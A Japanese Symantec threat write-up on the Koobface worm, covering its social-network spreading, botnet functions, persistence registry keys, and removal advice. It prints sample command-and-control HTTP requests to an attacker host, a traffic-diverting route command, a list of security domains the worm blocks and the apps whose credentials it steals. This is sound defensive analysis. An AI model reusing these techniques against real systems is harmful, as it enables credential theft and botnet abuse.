発見日: August 03, 2008
更新日: July 11, 2013 8:42:05 AM
別名: Net-Worm.Win32.Koobface.b [Kaspersky], W32/Koobface.worm [McAfee], Boface.A [Panda Software], WORM_KOOBFACE.V [Trend], W32/Koobface-AS [Sophos], W32/Koobface-AL [Sophos], W32/Koobface-AD [Sophos], Koobface.GQ [Panda Software], Koobface.FU [Panda Software], W32/Koobface-N [Sophos], WORM_KOOBFACE.JG [Trend], WORM_KOOBFACE.EX [Trend], WORM_KOOBFACE.EY [Trend], WORM_KOOBFACE.BX [Trend], W32/Koobface.CZ [F-Secure], WORM_KOOBFACE.AZ [Trend], Net-Worm:W32/Koobface.ES [F-Secure], Win32/Koobface.AC [Computer Associates], W32/Koobface.CY [F-Secure], W32/Koobface.BM [F-Secure], WORM_KOOBFACE.F [Trend], WORM_KOOBFACE.E [Trend], Kbface [Panda Software], WORM_KOOBFACE.D [Trend], Troj/Mdrop-CMW [Sophos]
種別: Worm
感染サイズ: 不定
影響を受けるシステム: Windows

W32.Koobface は、ソーシャルネットワークサイトを介して拡散するワームです。 W32.Koobface は、その名称が Facebook のアナグラムであることからわかるように、主にソーシャルネットワークサイトを介して拡散するワームで、感染したコンピュータを使ってピアツーピア型ボットネットを構築します。感染したコンピュータは、別の感染したコンピュータに接続してピアツーピア形式で命令を受け取ります。このボットネットは、感染したコンピュータに追加のペイパーインストールマルウェアをインストールしたり、検索クエリーを乗っ取って広告を表示するために使用されます。

感染
W32.Koobface は、主として、動画にリンクするソーシャルネットワークサイトを介して拡散します。動画をホストする Web サイトをユーザーが訪問すると、動画コーデックやその他の必要な更新 (実際にはこのワームのコピー) をダウンロードするように要求します。

ソーシャルネットワークサイトの人気が W32.Koobface 拡散の鍵となります。ソーシャルネットワークサイトに的を絞ることによって、このワームはソーシャルエンジニアリングテクニックを利用して拡散します。ソーシャルネットワークサイトのユーザーは、友人や知人から投稿されたと思われるリンクは安全であるという錯覚に陥ります。リンクが友人またはこのワームのどちらから投稿されたものであるかを確認するのは困難であると思われます。


機能
W32.Koobface はピアツーピア型ボットネットを構築し、それは、広告を表示するために検索クエリーを乗っ取ったり、追加のペイパーインストール マルウェアを侵入先のコンピュータにインストールするために使用されます。侵入先のコンピュータは他の感染したコンピュータに接続してピアツーピア形式で命令を受け取ります。

このワームは、次の機能を実行することができます。

  • ソーシャルネットワークを介して拡散する
  • 機密情報を盗み取る
  • Web ブラウザに広告を挿入する
  • Web ブラウザを有害なサイトにリダイレクトする
  • インターネットトラフィックを傍受する
  • 特定のインターネットサイトへのアクセスをブロックする
  • 他の Koobface 感染コンピュータ用の Command and Control サーバーとして動作する Web サーバーを開始する
  • 自分自身の更新や偽のセキュリティ製品を含む他のペイパーインストールソフトウェアなどの、追加のファイルをダウンロードする
  • ソフトウェアのライセンスキーを盗み取る
  • CAPTCHA を解読する
  • Facebook によってリンクがブロックされるかどうか確認する
  • 新しい Blogspot アカウントとページを作成する
  • hosts ファイルを改ざんする



地理的分布
シマンテックでは、この脅威について、次の地理的分布を観測しています。





感染率
シマンテックでは、この脅威について、次の感染レベルを観測しています。





シマンテックの保護対策サマリー
シマンテックは、この脅威ファミリーに対する保護対策として次のコンテンツを提供しています。


ウイルス対策シグネチャ


ウイルス対策 (ヒューリスティック/汎用)


ブラウザ保護
シマンテック製品のブラウザ保護機能は、Web ブラウザを利用した感染の防御に効果を発揮します。


侵入防止システム (英語)

ウイルス対策日

  • Rapid Release 初回バージョン August 03, 2008 リビジョン 017
  • Rapid Release 最新バージョン July 13, 2019 リビジョン 019
  • Daily Certified 初回バージョン August 03, 2008 リビジョン 020
  • Daily Certified 最新バージョン July 14, 2019 リビジョン 001
  • Weekly Certified 初回リリース日 August 06, 2008

Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.


テクニカルノート

1. 防御と回避
1.1 ユーザーの対処と予防策
1.2 オペレーティングシステムとソフトウェアへのパッチの適用
2. 感染方法
3. 機能
3.1 インストール
3.2 DNS のブロック
3.3 情報の盗み取り
3.4 検索結果のリダイレクト
3.5 ネットワークトラフィックのリダイレクト
3.6 Web サーバー
3.7 CAPTCHA の解読

4. システムの変更
5. ネットワーク関連操作
6. 追加情報



1. 防御と回避
この脅威によるリスクを回避または最小限にするために、次のアクションを実行してください。


1.1 ユーザーの対処と予防策
この脅威は、ソーシャルネットワークサイトに投稿されたリンクをユーザーがクリックすることで拡散する可能性があります。マルウェア作成者は、ソーシャルエンジニアリング手法をよく利用します。一般に、わいせつな内容や、センセーショナルなニュースや記述を使ってユーザーの関心を引き、ユーザーに偽装リンクをクリックさせます。

ソーシャルネットワークのユーザーは、自分の友人を含む他のユーザーから投稿されたリンクをクリックするときは常に注意する必要があります。リンクが含まれているメッセージに文法やスペルの間違いがあるときは、そのリンクが正規のものではなく、想定されるユーザーによって投稿されていないことを示す可能性が高いといえます。通常、マウスポインタをリンクの上に乗せるなどの基本的なチェックにより、リンク先を確認することができます。また、Norton セーフウェブ などのオンライン Web サイト評価サービスを利用して、そのサイトの安全性を確認することもできます。

動画を紹介しながら、その動画を再生するためにコーデックや他のソフトウェアが必要であると説明するサイトには注意してください。それらの動画は有害なソフトウェアとともにダウンロードされるしかけになっていることが多く、この脅威の拡散に用いられる既知の手法です。


1.2 オペレーティングシステムとソフトウェアへのパッチの適用
オペレーティングシステムとインストール済みのソフトウェアに間違いなくパッチが適用されていて、ウイルス対策とファイアウォールソフトウェアが最新の状態で動作可能であることを確認してください。可能であれば自動更新を有効にし、最新のパッチや更新プログラムが利用可能になったときにコンピュータが受信できるようにしておきます。



2. 感染方法
W32.Koobface は、主に動画にリンクするソーシャルネットワークサイトを介して拡散します。動画をホストする Web サイトをユーザーが訪問すると、動画コーデックやその他の必要な更新 (実際にはこのワームのコピー) をダウンロードするように要求します。

偽の Web サイトとワームの実行可能ファイルをホストする Web サーバーは、実際にこのワームによって侵害されたコンピュータです。W32.Koobface は、偽の Web サイトのスタイルを頻繁に変更し、これまでに、偽の Facebook 動画ページ、YouTube ページ、CNET ダウンロードページ、Facebook セキュリティページ、オンラインウイルススキャンページなどを使用しました。Koobface Web サーバーとして動作している 1 台の感染済みコンピュータが、これら複数バージョンの偽サイトをホストします。








ソーシャルネットワークサイトで拡散するために、このワームは侵入先のコンピュータでブラウザ cookie を検索し、ソーシャルネットワークサイトが使用されているかどうかチェックします。見つかった場合は、Command and Control サーバーは、特定のソーシャルネットワークサイトにこのワームを拡散するように設計されたコンポーネントをダウンロードするように、侵入先のコンピュータに要求します。

標的とするソーシャルネットワークサイトごとに、ダウンロード、保存、実行されるファイルの例を次に示します。

ソーシャルネットワークサイト: Facebook
GET 要求で使用されるファイル名: fb[バージョン番号].exe
保存時のファイル名: freddy[バージョン番号].exe
ソーシャルネットワークサイト: hi5
GET 要求で使用されるファイル名: hi[バージョン番号].exe
保存時のファイル名: hippy[バージョン番号].exe
ソーシャルネットワークサイト: MySpace
GET 要求で使用されるファイル名: ms[バージョン番号].exe
保存時のファイル名: mstre[バージョン番号].exe
ソーシャルネットワークサイト: Twitter
GET 要求で使用されるファイル名: tw[バージョン番号].exe
保存時のファイル名: twitty[バージョン番号].exe
ソーシャルネットワークサイト: Bebo
GET 要求で使用されるファイル名: be[バージョン番号].exe
保存時のファイル名: sber[バージョン番号].exe
ソーシャルネットワークサイト: Tagged
GET 要求で使用されるファイル名: tg[バージョン番号].exe
保存時のファイル名: tag[バージョン番号].exe
ソーシャルネットワークサイト: Netlog
GET 要求で使用されるファイル名: nl[バージョン番号].exe
保存時のファイル名: nl[バージョン番号].exe
ソーシャルネットワークサイト: Fubar
GET 要求で使用されるファイル名: fu[バージョン番号].exe
保存時のファイル名: fu[バージョン番号].exe
ソーシャルネットワークサイト: Friendster
GET 要求で使用されるファイル名: fr[バージョン番号].exe
保存時のファイル名: fr[バージョン番号].exe
ソーシャルネットワークサイト: MyYearbook
GET 要求で使用されるファイル名: yb[バージョン番号].exe
保存時のファイル名: yb[バージョン番号].exe


ファイルは Command and Control サーバーから要求され、%Windir% フォルダに保存されます。

このワームは、常にすべての拡散コンポーネントに役立つというわけではありません。たとえば、これらのソーシャルネットワークすべてを利用するユーザーは、そのうちのいくつかのモジュールだけを受け取る可能性があります。

これらのモジュールには、標的となるソーシャルネットワークに特化したコードが含まれます。このワームは、侵入先のコンピュータでセッション認証 cookie を使用してユーザーになりすまし、そのユーザーのソーシャルネットワークの連絡先に悪質なリンクを投稿します。

たとえば、あるユーザーが Facebook にログインしていて、ブラウザウィンドウを開いている場合、このワームは自分の動作をユーザーから隠すためにブラウザウィンドウを非表示にします。そのようにして、影響を受けるユーザーに怪しまれるようなウィンドウを表示することなく、Command and Control サーバーから提供された有害なリンクを含むメッセージを投稿します。

次の例は、Facebook モジュールがどのように Facebook 上で W32.Koobface を拡散するかを示しています。
まず、このワームは感染したユーザーのすべての知り合いに Facebook を介してメッセージを送信します。これは、侵入先のコンピュータで Facebook のセッション認証 cookie を乗っ取ることによって実行されます。また、このワームは必要に応じて Firefox の cookie を Internet Explorer の cookie に変換します。

感染した Facebook ユーザーの友人は、興味深い動画を紹介したメッセージを受け取ったり、Facebook のウォールに同様のリンクが投稿される可能性があります。







そのような悪質なリンクをクリックすると、偽の動画ページにリダイレクトする有害な Web サイトに誘導されます。偽の動画ページは、動画を再生するためにコーデックをダウンロードするように促します。このコーデックは、実際はこのワームのインストーラです。








3. 機能

このワームは、次の機能を実行することができます。

  • ソーシャルネットワークを介して拡散する
  • 機密情報を盗み取る
  • Web ブラウザに広告を挿入する
  • Web ブラウザを有害なサイトにリダイレクトする
  • インターネットトラフィックを傍受する
  • 特定のインターネットサイトへのアクセスをブロックする
  • 他の Koobface 感染コンピュータ用の Command and Control サーバーとして動作する Web サーバーを開始する
  • 自分自身の更新や偽のセキュリティ製品を含む他のペイパーインストールソフトウェアなどの、追加のファイルをダウンロードする
  • ソフトウェアのライセンスキーを盗み取る
  • CAPTCHA を解読する
  • Facebook によってリンクがブロックされるかどうか確認する
  • 新しい Blogspot アカウントとページを作成する
  • hosts ファイルを改ざんする


3.1 インストール
W32.Koobface は、ソーシャルネットワークサイトのリンクをクリックした後、しばしば偽のコーデックインストーラ (setup.exe など) として投稿されるファイルとして届きます。ファイルを実行すると、Windows ディレクトリに自分自身をコピーします。そのコピーに使用されるファイル名は、ハードコードされ、このワームのビルドのバージョンによって異なります (ld02.exe、ld10.exe、ld14.exe など)。

また、このワームは、主要コンポーネントが Windows ディレクトリ内 (C:\Windows\[亜種].exe) でカレントバージョンのコンポーネントによって使用されているファイル名 (C:\Windows\ld14.exe) で実行されているかどうかを確認する自己チェックルーチンを備えています。そうでない場合は、上記のディレクトリに自分自身をコピーし、そのコピーを実行した後、バッチファイル (C:\[亜種].bat) を投下します。これにより、カレントの実行可能ファイルが終了後に削除されます。

侵入先のコンピュータでこのワームのインスタンスが 1 つだけ実行されるように、英数字の文字列を含む名前でミューテックスを作成します。このミューテックスの名前は、ハードコードされますが、ハードコードされる前にランダムに生成されるように見えます。この名前も、ワームのバージョンまたはビルドによって異なります。

注意: このオブジェクトに使用される名前とコンポーネントのファイル名は、亜種によって異なります。

次のレジストリエントリを作成して、Windows が起動されるたびに自分自身が実行されるようにします。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sys[亜種]tray" = "%Windir%\[亜種][バージョン番号].exe"

注意: 上記のレジストリエントリの例を次に示します。
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sysldtray" = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"


3.2 DNS のブロック
このワームは、侵入先のコンピュータがさまざまなドメイン、主に知名度の高いセキュリティ Web サイトなどのドメインに訪問するのを阻止します。この操作を実行するモジュールは、通常、v2prx.exe という名前が付けられ、次の 2 つのファイルを投下します。
  • ddnsFilter.dll または filter.sys
  • fio32.dll または fio32.sys

次の文字列を含むドメインはすべてブロックされます。
  • a-2.org
  • agnitum
  • aluriasoftware
  • antivir
  • antiviraldp
  • anti-virus
  • attechnical
  • authentium
  • avast
  • avgfrance
  • avg.
  • avp.
  • bitdefender
  • blackice
  • ccsoftware
  • centralcommand
  • deerfield
  • dialognauka
  • diamondcs
  • drsolomon
  • drweb
  • eicar
  • emsisoft
  • esafe
  • eset
  • fileburst
  • finjan
  • fmsinc
  • free-av
  • f-secure
  • gecadsoftware
  • grisoft
  • gwava
  • hackerwatch
  • housecall
  • iavs.cz
  • ieupdate
  • ikarus-software
  • inline-software
  • javacoolsoftware
  • kaspersky
  • kerio
  • k-otik
  • lavasoft
  • liutilities
  • looknstop
  • malwarebytes
  • mcafee
  • megasecurity
  • microworldsystems
  • misec
  • moosoft
  • my-etrust
  • networkassociates
  • noadware
  • nod32
  • norman.no
  • nsclean
  • openantivirus
  • pandasoftware
  • pestpatrol
  • psnw.
  • pspl.
  • ravantivirus
  • safer-networking
  • safetynet
  • sald.com
  • securitoo
  • secuser
  • simplysup
  • sophos
  • spyblocker-software
  • spycop
  • spywareguide
  • stiller
  • sybari
  • sygate
  • symantec
  • tinysoftware
  • toonbox
  • trapware
  • trendmicro
  • turvamies
  • viguard
  • viruslist
  • virustotal
  • visualizesoftware
  • vsantivirus
  • wilderssecurity
  • wildlist
  • windowsupdate
  • winpatrol
  • x-cleaner
  • zeylstra
  • zonelabs
  • zonelog

また、設定済みの DNS サーバーは変更される可能性があります。


3.3 情報の盗み取り
W32.Koobface は、機密情報を盗み取ることができます。この機能は別のモジュールに実装されていて、ダウンロードされて次のファイル名で保存されることが確認されています。
  • go.exe
  • get.exe

このモジュールを使用して、製品 ID、インストール済みのアプリケーション、ユーザー名、POP3 サーバー、ログイン資格情報、ユーザーロケールなどを含むシステム情報を収集し、P3ML 形式でデータをコンパイルします。このワームは、base64 形式を使用して収集した情報をエンコードし、いずれかの Command and Control サーバーに投稿します。

標的となるログイン資格情報は、FTP、電子メール、インスタントメッセージ、Web プロファイル、ファイル共有アカウントなどで、次のアプリケーションのログイン資格情報も含まれます。
  • Becky! Internet Mail
  • Coffeecup Software
  • cuteFTP
  • Depositfiles
  • Eudora
  • FTP commander
  • FileZilla
  • FlashFXP
  • GAIM
  • ICQ
  • Ipswitch
  • Mail.ru
  • Megaupload
  • Microsoft Outlook
  • Mozilla
  • Mozilla Thunderbird
  • Opera
  • Outlook Express
  • Passport.NET
  • Punto Switcher
  • QIP
  • RITLabs The Bat! Email client
  • Rapget
  • Rapidshare
  • SmartFTP
  • Total Commander
  • Trillian
  • Universal Share Downloader
  • Windows Live

また、このワームはソーシャルネットワークのプロファイル情報を収集して盗み取ります。ソーシャルネットワークは、地理的ロケーション、誕生日、アクティビティ、出身校、電子メールアドレス、連絡先リスト、趣味などのさまざまな情報を保有しています。この情報が収集され、HTTP POST 要求を介して Command and Control サーバーに送信されます。




要求をデコードすると、広範囲にわたる情報が収集されて Command and Control サーバーに送信されたことがわかります。





3.4 検索結果のリダイレクト
このワームは、Web 検索結果リストにコードを挿入することができます。ユーザーが検索結果リストで有効なリンクをチェックしようとすると、広告用や悪質なコンテンツにリダイレクトします。この機能もまた、ダウンロード可能なモジュールとして実装されます。

このモジュールは、次の 2 つの方法で配布されることが確認されています。
  1. 別のファイル (BrowserCtl.dll または BrowserCtl.sys)
  2. DNS ブロッカーコンポーネントに組み込まれる (DDnsFilter.DLL)

このモジュールは、検索またはクエリーを乗っ取るために、URL に含まれる次のトークンまたは文字列を探します。
  • hTtp/1.1 404 reSOURcE NoT FOunD\r\n\r
  • google
  • search.yahoo
  • search.msn
  • search.live
  • bing
  • search.aol
  • ask
  • search.mywebsearch
  • inurl:
  • related:
  • intitle:
  • intext:
  • cache:
  • tbns:
  • toolbarqueries
  • googleadservices
  • sugg.search
  • img.youtube.com
  • .yimg.com
  • metacafe.com
  • yahooapis.com
  • .aolcdn.com
  • .sa.aol.com

操作された検索結果は、攻撃者が制御する不正な Web サイトにユーザーを誘導する可能性があります。これらの Web サイトは、偽のウイルス感染警告を発して、ミスリーディングアプリケーション などの他のマルウェアをユーザーにダウンロードさせようとする可能性があります。





検索リダイレクタと Command and Control サーバーとの一連のトランザクションの例を次に示します。

まず、ユーザーは google.com を使って「stanley」を検索します。

GET /complete/search?hl=en&q=stanley HTTP/1.1
Referer: http://www.google.com/

このワームは、検索を検出し、同じ検索用語を Koobface の Command and Control サーバーに送信します。Command and Control サーバーは、ユーザーのリダイレクト先に関する情報を返します。

GeT /v50/?v=92&s=G&uid=-207922....&p=1000&q=stanley HttP/1.0

結果リストをクリックすると、感染したコンピュータはミスリーディングアプリケーションを拡散するために使用される、偽のセキュリティスキャンサイトにリダイレクトされます。

POST /click.php?c=6cd95921027704e5677a3f732600 HTTP/1.1

GET /online/9eb761c878134c642afeef551b8048ca/f67b46eed9e6f7d9e584824b2edeed9c/3656b9eddb95cfb9d7f013ed46b015a2 HTTP/1.1


3.5 ネットワークトラフィックのリダイレクト
W32.Koobface は、Command and Control サーバーからの指示があれば、外向きのインターネットトラフィックを迂回させる可能性があります。Command and Control サーバーから BLOCKIP コマンドが与えられると、このワームはローカル IP ルーティングテーブルに次の形式でエントリを追加します。

route add -p [DEST アドレス] mask [サブネットマスク] [HOP アドレス] metric 3

このエントリは、宛先 が[DEST アドレス]、サブネットマスクが [サブネットマスク]、Next Hop のアドレスが [HOP アドレス]、コストメトリックが 3 の永続的なルートを追加します。これによって、BLOCKIP コマンドはトラフィックを傍受し、定義済みのネットワークアドレス範囲に到達しようと試みます。ただし、通常、このワームは特定のネットワーク範囲へのアクセスをブロックするためだけにこの機能を使用します。


3.6 Web サーバー
このワームは、自分自身の拡散を主目的として、侵入先のコンピュータで Web サーバーを開始する可能性があります。

次のファイルは、Web サーバーとして動作するモジュールです。
%ProgramFiles%\webserver\webserver.exe

Web サーバーに使用されるファイルは次の名前の XML ファイルに保存されます。
%ProgramFiles%\webserver\webserver.dat

この Web サーバーモジュールは、Windows の netsh ツールを使って Windows ファイアウォールの例外リストを改ざんし、TCP ポート 80 と 53 への受信接続を許可します。

注意: この文書の記述時点では、このコンポーネントに DNS サーバー機能はなく、TCP と UDP 両方のポート 53 はまったく使用されていませんでした。

Windows の sc ユーティリティを使って、webserver という名前のサービスとして自分自身をインストールします。

XML 形式のデータファイル (webserver.dat) には、このワームの最新のバイナリインストーラ (setup.exe など) と、標的となるユーザーに見せる宣伝用 Web サイトで使用される HTML ページ、アイコンや画像が含まれます。このサイトには、偽の Facebook 動画ページ、偽の YouTube 動画ページ、偽の CNET ダウンロードページなどがあります。

Web サーバーはリモートサーバーに報告し、その後 C&C ドメインから XML ファイルを受け取り、%ProgramFiles%\webserver フォルダ内の .dat ファイルに保存します。

新しく感染したコンピュータ上の Web サーバーモジュールは、まず、Command and Control サーバーとして動作する別の感染済みコンピュータに接続して、配布するファイルを取得します。

POST /webserver/?uptime=782254&v=0&sub=56&ping=135&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 0

HTTP/1.1 200 OK
Date: [日付]
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: [コンテンツサイズ]
Connection: close
Content-Type: text/xml
[XML データファイル]

その後、command and control サーバーは新しく感染したコンピュータに接続して、そのコンピュータのアップタイムを測定して、Web サーバーモジュールが適切に動作していることを確認します。

注意: このワームの Web サーバーは、「Apache/1.3.27 (Unix) (Red-Hat/Linux)」を実行しているように装います。

GET /?uptime HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 13
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: text/html
uptime=782255

最後に、command and control サーバーは新しく感染したコンピュータが適切にワームを配布していることを確認します。

GET /pid=1000/setup.exe HTTP/1.0
Sample Web server response:
HTTP/1.1 200 OK
Content-Length: 38656
Connection: close
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux)
Content-Type: application/octet-stream

[KOOBFACE インストーラバイナリ]

このワームの Web サーバーがアクセスされるたびに、このコンポーネントは command and control サーバーへのレポートにアクセスログを含めます。各ログの形式を次に示します。
[ホスト IP アドレス]|[ユーザーエージェント情報]|[URL]|[ドメインリダイレクタ]|[コンポーネントディレクトリ]|1000
POST /webserver/?uptime=1004&v=158&sub=56&ping=68&proxy=0 HTTP/1.0
accept-encoding: text/html, text/plain
COnnecTIon: cLOse
Host: capthcabreak.com
Content-Type: binary/octet-stream
Content-Length: 323
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|||ms|1000
75.64.192.29|Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)|[http://]74.2.159.54/pid=1000/view/f=ms/console=ye[削除済み]

HTTP/1.1 200 OK
Date: Thu, 12 Nov 2009 01:27:56 GMT
Server: Apache/1.3.41 (Unix)
Cache-Control: no-cache
Content-Length: 96
Connection: close
Content-Type: text/xml



3.7 CAPTCHA の解読
このワームは、ソーシャルネットワークサイトに投稿を試みる際に、CAPTCHA に遭遇する可能性があります。CAPTCHA は、人によって使用されるように設計されたサービスに自動化されたシステムがアクセスするのを防ぐために工夫された方式です。しばしば、アカウントの自動作成を防ぐために Web サイトのサインアッププロセスで使用されます。これらの CAPTCHA を回避するために、Koobface は Command and Control サーバーにその CAPTCHA をアップロードします。すると、侵入先のコンピュータ上に CAPTCHA が表示されます。CAPTCHA がフルスクリーンモードで表示され、侵入先のコンピュータは CAPTCHA が解読されるまで使用できなくなります。

その後、CAPTCHA の解読法が最初に要求したコンピュータに返信されます。この方式を利用して、Koobface ボットネットの制御者たちは、収益を上げるために感染したコンピュータを利用するだけでなく、それらのコンピュータのユーザーにも自分たちに役立つことをさせようとます。これにより、Koobface の制御者は世界中に分散された労働力を利用することができるようになります。






4. システムの変更

この脅威ファミリーによって侵害されたコンピュータ上では、次の副次的な影響が観測される可能性があります。


作成されるファイルまたはフォルダ
次の 1 つ以上のファイルが作成されます。
  • be[バージョン番号].exe
  • fb[バージョン番号].exe
  • fr[バージョン番号].exe
  • fr[バージョン番号].exe
  • freddy[バージョン番号].exe
  • fu[バージョン番号].exe
  • fu[バージョン番号].exe
  • hi[バージョン番号].exe
  • hippy[バージョン番号].exe
  • ms[バージョン番号].exe
  • mstre[バージョン番号].exe
  • nl[バージョン番号].exe
  • nl[バージョン番号].exe
  • sber[バージョン番号].exe
  • tag[バージョン番号].exe
  • tg[バージョン番号].exe
  • tw[バージョン番号].exe
  • twitty[バージョン番号].exe
  • yb[バージョン番号].exe
  • yb[バージョン番号].exe


削除されるファイルまたはフォルダ
なし


変更されるファイルまたはフォルダ
なし


作成されるレジストリサブキーまたはレジストリエントリ
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sys[亜種]tray" = "%Windir%\[亜種][バージョン番号].exe"

注意: 上記のレジストリエントリの例を次に示します。
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"sysldtray" = "%Windir%\ld16.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"systwtray" = "%Windir%\twitty02.exe"


削除されるレジストリサブキーまたはレジストリエントリ

なし


変更されるレジストリサブキーまたはレジストリエントリ (最終値)
なし



5. ネットワーク関連操作
この脅威は、次のネットワーク関連操作を実行する可能性があります。


ダウンロード
  • 追加のファイル (追加機能、更新、または設定ファイルを含むコードモジュール) をダウンロードする可能性があります。
  • 次のサイトから広告をダウンロードする可能性があります。
    • [http://]91.188.59.186/main[削除済み]
    • [http://]91.188.59.187/main[削除済み]
    • [http://]www.kyxct.in/get[削除済み]
    • [http://]195.78.108.230/get[削除済み]
    • [http://]www.lskjf.in/get[削除済み]
    • [http://]www.rtlyh.in/get[削除済み]
    • [http://]www.ptyoj.in/get[削除済み]


アップロード
リモートロケーションに機密情報をアップロードする可能性があります。


その他のネットワーク関連操作
  • DNS をブロックするか、hosts ファイルを改ざんすることにより、指定されたドメインへのブロックをアクセスする可能性があります。
  • 特定のドメインへの外向きのインターネットトラフィックを迂回させる可能性があります。
  • Web 検索結果を広告や他の悪質なコンテンツにリダイレクトする可能性があります。



6. 追加情報
この脅威ファミリーに関する追加情報については、次のサイトを参照してください。

推奨する感染予防策

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":

  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
  • For further information on the terms used in this document, please refer to the Security Response glossary.


駆除方法

お使いのシマンテック製品がこのリスクについて警告した場合、またはこのリスクへの感染について懸念がある場合は、このページをご確認ください。 次に進む前に、 Symantec Full System Scan User Guidehttp://www.symantec.com/business/theme.jsp?themeid=full-system-scan (英語) を参照して、システムの完全スキャンを実行することをお勧めします。それでも問題が解決されない場合は、次のいずれかのオプションをお試しください。 Norton (個人向け) 製品のお客様 お客様が Norton 製品のユーザーである場合、このリスクの駆除に関する以下の情報を参照することをお勧めします。 駆除ツール ノートンパワーイレイサーhttp://security.symantec.com/nbrt/npe.aspx?lcid=1041 ノートンブータブルリカバリツール (ノートンパワーイレイサーでリスクを駆除できなかった場合)http://security.symantec.com/nbrt/nbrt.aspx?lcid=1041 感染した Windows システムファイルがある場合は、 Windows のインストール CD を使ったファイルの置き換えhttps://support.norton.com/sp/ja/jp/home/current/solutions/20101021151043JP?entsrc=redirect_pubweb&product=home&pvid=f-home&version=1が必要な場合があります。 感染のリスクを軽減する方法 感染のリスクの軽減に役立つ詳細情報とベストプラクティスを、次のサイトで確認できます。 オペレーティングシステムの更新による脆弱性の修正http://jp.norton.com/security_response/vulnerabilities.jsp ファイル共有の保護http://jp.norton.com/security_response/filesharingprotection.jsp マイクロソフトサポート技術情報 - 967715 - Windows の自動実行機能を無効にする方法http://support.microsoft.com/kb/967715/ja インスタントメッセージに関するベストプラクティスhttp://jp.norton.com/security_response/safeguardim.jsp Web の閲覧に関するベストプラクティスhttp://jp.norton.com/security_response/browsewebsafely.jsp 電子メールに関するベストプラクティスhttp://jp.norton.com/security_response/secureemail.jsp ビジネス (企業、法人向け) 製品のお客様 お客様がシマンテックのビジネス製品のユーザーである場合、このリスクの駆除に関する以下の情報を参照することをお勧めします。 疑わしいファイルの特定と提出 提出された疑わしいファイルにより、シマンテックでは、保護機能が絶えず変化し続ける脅威の動向に対応していることを確認できます。提出されたファイルはシマンテックセキュリティレスポンスによって解析され、必要な場合は、更新された定義が LiveUpdate™ を介して直ちに配布されます。これにより、周辺のその他のコンピュータを攻撃から確実に保護することができます。シマンテックに提出する疑わしいファイルを特定する方法は、次のサイトで確認できます。 SEP サポートツールの Load Point Analysis 機能で疑わしいファイルを探す方法http://www.symantec.com/business/support/index?page=content&id=TECH141402&locale=ja_JP How to Use the Web Submission Process to Submit Suspicious Fileshttp://www.symantec.com/business/support/index?page=content&id=TECH102419&locale=en_US (英語) 駆除ツール Symantec Help (SymHelp) Downloadhttp://www.symantec.com/business/support/index?page=content&id=TECH170752&locale=en_US (英語) About Symantec Power Eraserhttp://www.symantec.com/business/support/index?page=content&id=TECH134803&locale=en_US (英語) Symantec Power Eraser ユーザーガイドhttp://www.symantec.com/ja/jp/business/theme.jsp?themeid=spe-user-guide 感染した Windows システムファイルがある場合は、「 How to use the Symantec Endpoint Recovery Tool to replace an infected filehttp://www.symantec.com/business/support/index?page=content&id=HOWTO41831&locale=en_US」(英語) に記載の手順によるファイルの置き換えが必要な場合があります。 感染のリスクを軽減する方法 感染のリスクの軽減に役立つ詳細情報とベストプラクティスを、次のサイトで確認できます。 セキュリティのベストプラクティス - インターネットのあらゆる脅威を阻止するhttp://www.symantec.com/ja/jp/business/theme.jsp?themeid=stopping_malware 手動による駆除 以下の手順は、現在サポート対象のシマンテック製ウイルス対策製品のすべてを対象に記述されています。 1. システムの完全スキャンの実行 Symantec Full System Scan User Guide (英語)http://www.symantec.com/business/theme.jsp?themeid=full-system-scan 